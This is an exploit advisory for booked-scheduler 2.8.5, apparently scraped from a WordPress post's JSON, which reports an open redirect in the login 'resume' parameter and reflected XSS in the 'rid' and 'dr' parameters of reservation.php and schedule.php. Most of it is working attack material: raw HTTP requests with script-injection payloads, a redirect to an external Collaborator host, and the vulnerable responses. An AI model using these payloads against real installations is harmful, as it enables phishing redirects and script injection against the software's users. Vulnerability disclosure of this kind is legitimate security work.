# Exploit Title: Open Redirect \/ Reflected XSS – booked-schedulerv2.8.5
# Date: 10\/2024
# Exploit Author: Andrey Stoykov
# Version: 2.8.5
# Tested on: Ubuntu 22.04
# Blog:
https:\/\/msecureltd.blogspot.com\/2024\/10\/friday-fun-pentest-series-13-reflected.html
https:\/\/msecureltd.blogspot.com\/2024\/10\/friday-fun-pentest-series-12-open.html<\/p>\n
Open Redirect:<\/p>\n
Steps to Reproduce:<\/p>\n
1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
2. In the “resume” parameter add the redirect URL e.g. Burp Collab
3. Forward the request<\/p>\n
index.php<\/p>\n
\/\/ HTTP POST login request<\/p>\n
POST \/Bookedbo8effotfu\/Web\/index.php HTTP\/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko\/20100101 Firefox\/132.0
[…]\n
email=admin&password=password&captcha=&login=submit&resume=
https:\/\/urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg<\/p>\n
\/\/ HTTP response<\/p>\n
HTTP\/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https:\/\/urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text\/html; charset=UTF-8<\/p>\n
Reflected XSS:<\/p>\n
reservation.php<\/p>\n
\/\/ HTTP GET request<\/p>\n
GET
\/Bookedbo8effotfu\/Web\/reservation.php?rid=”><script>alert(document.domain)<\/script>
HTTP\/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
new_version=v%3D2.8.5%2Cfs%3D1728734988;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko\/20100101 Firefox\/132.0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive<\/p>\n
\/\/ HTTP response<\/p>\n
HTTP\/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text\/html; charset=UTF-8
Content-Length: 14003<\/p>\n
<h5><a
href=”\/\/localhost\/Bookedbo8effotfu\/Web\/reservation.php?rid=”><script>alert(document.domain)<\/script>”>Return
to the last page that you were on<\/a><\/h5>
<\/div><\/p>\n
schedule.php<\/p>\n
\/\/ HTTP GET request<\/p>\n
GET
\/Bookedldk0euwfjx\/Web\/schedule.php?dr=”><script>alert(document.domain)<\/script>
HTTP\/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;
resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;
schedule_calendar_toggle=false
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko\/20100101 Firefox\/132.0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive<\/p>\n
\/\/ HTTP response<\/p>\n
HTTP\/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text\/html; charset=UTF-8
Content-Length: 7853<\/p>\n
<h5><a
href=”\/\/localhost\/Bookedldk0euwfjx\/Web\/schedule.php?dr=”><script>alert(document.domain)<\/script>”>Return
to the last page that you were on<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Open Redirect \/ Reflected XSS – booked-schedulerv2.8.5# Date: 10\/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https:\/\/msecureltd.blogspot.com\/2024\/10\/friday-fun-pentest-series-13-reflected.htmlhttps:\/\/msecureltd.blogspot.com\/2024\/10\/friday-fun-pentest-series-12-open.html Open Redirect: Steps to Reproduce: 1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the “resume” parameter add the redirect URL e.g. Burp Collab3. Forward the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59977","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59977","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59977"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59977\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59977"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59977"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}